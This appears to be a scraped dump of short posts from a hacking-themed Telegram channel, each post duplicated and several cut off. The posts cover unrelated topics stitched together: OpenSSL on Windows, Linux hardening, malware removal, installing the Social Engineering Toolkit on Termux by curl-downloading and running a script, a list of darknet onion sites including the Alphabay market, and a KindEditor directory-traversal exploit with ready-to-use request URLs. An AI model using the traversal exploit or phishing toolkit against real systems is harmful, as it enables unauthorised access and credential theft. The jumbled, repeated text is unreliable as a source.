β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ How to install the most recent version of OpenSSL on Windows 10 :
Take OpenSSL for example.
This open source cryptographic library that implements the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols is designed to βprotect communications over computer networks from eavesdropping,β but guess what?
2) From the very beginning, it was riddled with mistakes.
This can be inevitable, to a certain extent - after all, we're talking about software.
While there is nothing you can do about bugs that have yet to be identified, you can at least protect your systems from bugs that are already fixed and documented.
It's a shame that the official OpenSSL site only offers Linux source.
While Linux distributions usually ship with OpenSSL, this does not apply to Windows ... or, say, "Windows distributions".
If you want to run it, you need a Windows binary, and if you don't want to build it yourself, you must find another option.
1) Step 1. Download the binary
Finding OpenSSL binaries for Windows is no easy task, but don't despair.
They exist.
2) To download the required one, follow the link:
https://slproweb.com/products/Win32OpenSSL.html
Don't be fooled by either the Win32 string in the URL or the navigation pointing to a seemingly ancient download page from back in 2004.
3) Scroll down to the Download Win32 OpenSSL section.
Now you need to select the correct file from this list.
4) There are two main types for each version: light and full.
5) Download a file called "Win64 OpenSSL v1.1.0f" (or a newer version as soon as it becomes available) to download the full installer.
6) Step 2. Run the installer
We recommend installing OpenSSL outside of your Windows system directory.
Follow the GUI installation instructions.
7) Step 3. Run the OpenSSL binary
To get started with OpenSSL, you can simply right click on it in Windows Explorer at its installation location, like in my case:
C: \ OpenSSL-Win64 \ bin \
then select "Run as administrator".
8) You can now start generating OpenSSL keys. (By the way, users of the PuTTY remote access utility can export the OpenSSH key from PuTTYgen.)
9) When using OpenSSL on Windows this way, you simply skip the openssl command you see at the prompt.
For example, to create a key pair using OpenSSL on Windows, you can enter:
10) openssl req -newkey rsa: 2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
and follow the onscreen instructions as usual.
11) To view the certificate:
openssl x509 -text -noout -in certificate.pem
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ How to install the most recent version of OpenSSL on Windows 10 :
Take OpenSSL for example.
This open source cryptographic library that implements the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols is designed to βprotect communications over computer networks from eavesdropping,β but guess what?
2) From the very beginning, it was riddled with mistakes.
This can be inevitable, to a certain extent - after all, we're talking about software.
While there is nothing you can do about bugs that have yet to be identified, you can at least protect your systems from bugs that are already fixed and documented.
It's a shame that the official OpenSSL site only offers Linux source.
While Linux distributions usually ship with OpenSSL, this does not apply to Windows ... or, say, "Windows distributions".
If you want to run it, you need a Windows binary, and if you don't want to build it yourself, you must find another option.
1) Step 1. Download the binary
Finding OpenSSL binaries for Windows is no easy task, but don't despair.
They exist.
2) To download the required one, follow the link:
https://slproweb.com/products/Win32OpenSSL.html
Don't be fooled by either the Win32 string in the URL or the navigation pointing to a seemingly ancient download page from back in 2004.
3) Scroll down to the Download Win32 OpenSSL section.
Now you need to select the correct file from this list.
4) There are two main types for each version: light and full.
5) Download a file called "Win64 OpenSSL v1.1.0f" (or a newer version as soon as it becomes available) to download the full installer.
6) Step 2. Run the installer
We recommend installing OpenSSL outside of your Windows system directory.
Follow the GUI installation instructions.
7) Step 3. Run the OpenSSL binary
To get started with OpenSSL, you can simply right click on it in Windows Explorer at its installation location, like in my case:
C: \ OpenSSL-Win64 \ bin \
then select "Run as administrator".
8) You can now start generating OpenSSL keys. (By the way, users of the PuTTY remote access utility can export the OpenSSH key from PuTTYgen.)
9) When using OpenSSL on Windows this way, you simply skip the openssl command you see at the prompt.
For example, to create a key pair using OpenSSL on Windows, you can enter:
10) openssl req -newkey rsa: 2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
and follow the onscreen instructions as usual.
11) To view the certificate:
openssl x509 -text -noout -in certificate.pem
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
For example, create a new udev configuration file named 80-readonly-usb.rules in the /etc/udev/rules.d/ directory with the following content:
SUBSYSTEM == "block", ATTRS {removable} == "1", RUN {program} = "/ sbin / blockdev --setro% N"
Then apply the rule with the following command:
# udevadm control -reload
12) Disable TTY root access
To prevent the root account from logging in through all console devices (TTY), delete the contents of the securetty file by typing the following command at a command prompt as root.
# cp / etc / securetty /etc/securetty.bak
# cat / dev / null> / etc / securetty
Remember this rule does not apply to SSH login
To prevent logging in via SSH, edit the / etc / ssh / sshd_config file and add the following line:
PermitRootLogin no
13) Use POSIX ACL to extend system rights
Access Control Lists (ACLs) can define access rights for more than one user or group, and can define rights for programs, processes, files, and directories.
If you set an ACL for a directory, its child directories will automatically inherit the same rights.
For instance:
# setfacl -mu: user: rw file
# getfacl file
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
SUBSYSTEM == "block", ATTRS {removable} == "1", RUN {program} = "/ sbin / blockdev --setro% N"
Then apply the rule with the following command:
# udevadm control -reload
12) Disable TTY root access
To prevent the root account from logging in through all console devices (TTY), delete the contents of the securetty file by typing the following command at a command prompt as root.
# cp / etc / securetty /etc/securetty.bak
# cat / dev / null> / etc / securetty
Remember this rule does not apply to SSH login
To prevent logging in via SSH, edit the / etc / ssh / sshd_config file and add the following line:
PermitRootLogin no
13) Use POSIX ACL to extend system rights
Access Control Lists (ACLs) can define access rights for more than one user or group, and can define rights for programs, processes, files, and directories.
If you set an ACL for a directory, its child directories will automatically inherit the same rights.
For instance:
# setfacl -mu: user: rw file
# getfacl file
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦no root Social Engineering Toolkit on Termux
#FastTips
1) pkg update && pkg upgrade -y
2) apt install curl -y
3) curl -LO https://raw.githubusercontent.com/Hax4us/setoolkit/master/setoolkit.sh
4) sh setoolkit.sh
5) After finishing the above process type the following command
6) cd setoolkit
7) ./setup.py install
8) ./setoolkit
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦no root Social Engineering Toolkit on Termux
#FastTips
1) pkg update && pkg upgrade -y
2) apt install curl -y
3) curl -LO https://raw.githubusercontent.com/Hax4us/setoolkit/master/setoolkit.sh
4) sh setoolkit.sh
5) After finishing the above process type the following command
6) cd setoolkit
7) ./setup.py install
8) ./setoolkit
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦DarkNet SITES 24/24 β- 7/24
https://onion.cab - clearnet (!) onion.cab, view hidden onion sites without Tor;
http://facebookcorewwwi.onion - Facebook, the same one));
http://sms4tor3vcr2geip.onion - SMS4TOR, a self-destruct message service;
http://oi4bvjslpt5gabjq.onion - RΓ©publique de Hackers, another French-language hacker forum;
http://pwoah7foa6au2pul.onion - Alphabay market;
http://mail2tor2zyjdctd.onion - Mail2Tor, e-mail service;
http://torbox3uiot6wchz.onion - TorBox, e-mail service inside .onion;
http://zw3crggtadila2sg.onion/imageboard - TorChan, "Tor's # 1 imageboard";
http://cyjabr4pfzupo7pg.onion - CYRUSERV, a jabber service from CYRUSERV;
http://rutorc6mqdinc4cz.onion - RuTor.org, a well-known torrent tracker;
http://flibustahezeous3.onion is the famous onion-style electronic library.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦DarkNet SITES 24/24 β- 7/24
https://onion.cab - clearnet (!) onion.cab, view hidden onion sites without Tor;
http://facebookcorewwwi.onion - Facebook, the same one));
http://sms4tor3vcr2geip.onion - SMS4TOR, a self-destruct message service;
http://oi4bvjslpt5gabjq.onion - RΓ©publique de Hackers, another French-language hacker forum;
http://pwoah7foa6au2pul.onion - Alphabay market;
http://mail2tor2zyjdctd.onion - Mail2Tor, e-mail service;
http://torbox3uiot6wchz.onion - TorBox, e-mail service inside .onion;
http://zw3crggtadila2sg.onion/imageboard - TorChan, "Tor's # 1 imageboard";
http://cyjabr4pfzupo7pg.onion - CYRUSERV, a jabber service from CYRUSERV;
http://rutorc6mqdinc4cz.onion - RuTor.org, a well-known torrent tracker;
http://flibustahezeous3.onion is the famous onion-style electronic library.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Kindeditor traverse directory 0DAY problem:
KindEditor is a set of open source HTML visual editor, mainly used to allow users to obtain WYSIWYG editing effects on websites, compatible with mainstream browsers such as IE, Firefox, Chrome, Safari, Opera. KindEditor is written in JavaScript and can be seamlessly integrated with Java, .NET, PHP, ASP and other programs. KindEditor is very suitable for use on CMS, shopping malls, forums, blogs, Wikis, emails and other Internet applications. Since the first release of 2.0 in July 2006, KindEditor has continued to expand the editor market share with its excellent user experience and leading technology. Has become one of the most popular editors in China.
π¦Use method:
1) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/, burst out the absolute path D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php
2) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//According to the absolute path that broke out, modify the value of path to AppServ/www/67cms/
then it will be traversed d: All files and file names under /AppServ/www/67cms/
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Kindeditor traverse directory 0DAY problem:
KindEditor is a set of open source HTML visual editor, mainly used to allow users to obtain WYSIWYG editing effects on websites, compatible with mainstream browsers such as IE, Firefox, Chrome, Safari, Opera. KindEditor is written in JavaScript and can be seamlessly integrated with Java, .NET, PHP, ASP and other programs. KindEditor is very suitable for use on CMS, shopping malls, forums, blogs, Wikis, emails and other Internet applications. Since the first release of 2.0 in July 2006, KindEditor has continued to expand the editor market share with its excellent user experience and leading technology. Has become one of the most popular editors in China.
π¦Use method:
1) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/, burst out the absolute path D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php
2) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//According to the absolute path that broke out, modify the value of path to AppServ/www/67cms/
then it will be traversed d: All files and file names under /AppServ/www/67cms/
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Detect and remove malicious code from your phone or PC:
Malware is a catch-all term for any and every destructive / parasitic software specifically designed to harm your server, computer, network, or your phone. It is called by different names, but they all have the same intention.
There is Ransomware, which is literally software designed to steal your information and demand a ransom.
GonnaCry - Linux ransomware that encrypts all user files
With threats to reveal some data and secrets, the victim has no
choice but to pay a ransom.
In addition, there is Spyware, which is similar to Agent 007, which is malicious software designed to collect and steal information from its victims.
π¦There are other variations:
1) Logic bomb
2) Computer worms
3) Trojan horse
4) Rootkit
5) Virus
π¦But we are not discussing these terms and examples in today's.
It is important to know that your computer or phone can be infected with malware in various ways.
While most malware has the same symptoms and signs, some are more dangerous than others.
In fact, they all have the same result and backfire.
π¦Malware on your phone
Most people doubt that mobile devices can get infected with malware.
Β» It's true?
π¦This is 101% possible, well, maybe not in the standard traditional method, for iPhone and Apple devices.
But, technically, the same process applies.
Let's look at the problem more specifically.
Once the malware connects to your phone, it performs several
operations.
Competing with your phone's resources and destroying many programs.
The classic signs of malware on your phone are:
Apps take longer to load
Your battery is draining faster than usual
Apps you haven't downloaded appear as available
π¦How do I know if my phone is infected with a virus?
1) There are two ways to detect and remove malware from your phone.
2) Manual way
3) Automatic way
A) Step one: turn off your phone
The moment you spot the classic signs of malware infiltration, the first thing you do if you can't pinpoint where you entered is to turn off your phone.
B) Turning off your phone will stop further damage and the spread of malicious software to other programs.
C) This is the safest first option.
Step two: activate safe mode
Activating Safe Mode on your Android device is as easy as
Hold the power button for a few seconds.
Then, while your phone is on, hold the power off button.
Click on the reboot option; Most Android phones have this option.
π¦Then click "Restart in Safe Mode".
For devices that do not have this option, turn off the phone by long pressing the power button.
Then press and hold the volume down button, wait until the device turns on.
The Safe Mode option will appear in the lower left corner of your phone.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Detect and remove malicious code from your phone or PC:
Malware is a catch-all term for any and every destructive / parasitic software specifically designed to harm your server, computer, network, or your phone. It is called by different names, but they all have the same intention.
There is Ransomware, which is literally software designed to steal your information and demand a ransom.
GonnaCry - Linux ransomware that encrypts all user files
With threats to reveal some data and secrets, the victim has no
choice but to pay a ransom.
In addition, there is Spyware, which is similar to Agent 007, which is malicious software designed to collect and steal information from its victims.
π¦There are other variations:
1) Logic bomb
2) Computer worms
3) Trojan horse
4) Rootkit
5) Virus
π¦But we are not discussing these terms and examples in today's.
It is important to know that your computer or phone can be infected with malware in various ways.
While most malware has the same symptoms and signs, some are more dangerous than others.
In fact, they all have the same result and backfire.
π¦Malware on your phone
Most people doubt that mobile devices can get infected with malware.
Β» It's true?
π¦This is 101% possible, well, maybe not in the standard traditional method, for iPhone and Apple devices.
But, technically, the same process applies.
Let's look at the problem more specifically.
Once the malware connects to your phone, it performs several
operations.
Competing with your phone's resources and destroying many programs.
The classic signs of malware on your phone are:
Apps take longer to load
Your battery is draining faster than usual
Apps you haven't downloaded appear as available
π¦How do I know if my phone is infected with a virus?
1) There are two ways to detect and remove malware from your phone.
2) Manual way
3) Automatic way
A) Step one: turn off your phone
The moment you spot the classic signs of malware infiltration, the first thing you do if you can't pinpoint where you entered is to turn off your phone.
B) Turning off your phone will stop further damage and the spread of malicious software to other programs.
C) This is the safest first option.
Step two: activate safe mode
Activating Safe Mode on your Android device is as easy as
Hold the power button for a few seconds.
Then, while your phone is on, hold the power off button.
Click on the reboot option; Most Android phones have this option.
π¦Then click "Restart in Safe Mode".
For devices that do not have this option, turn off the phone by long pressing the power button.
Then press and hold the volume down button, wait until the device turns on.
The Safe Mode option will appear in the lower left corner of your phone.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β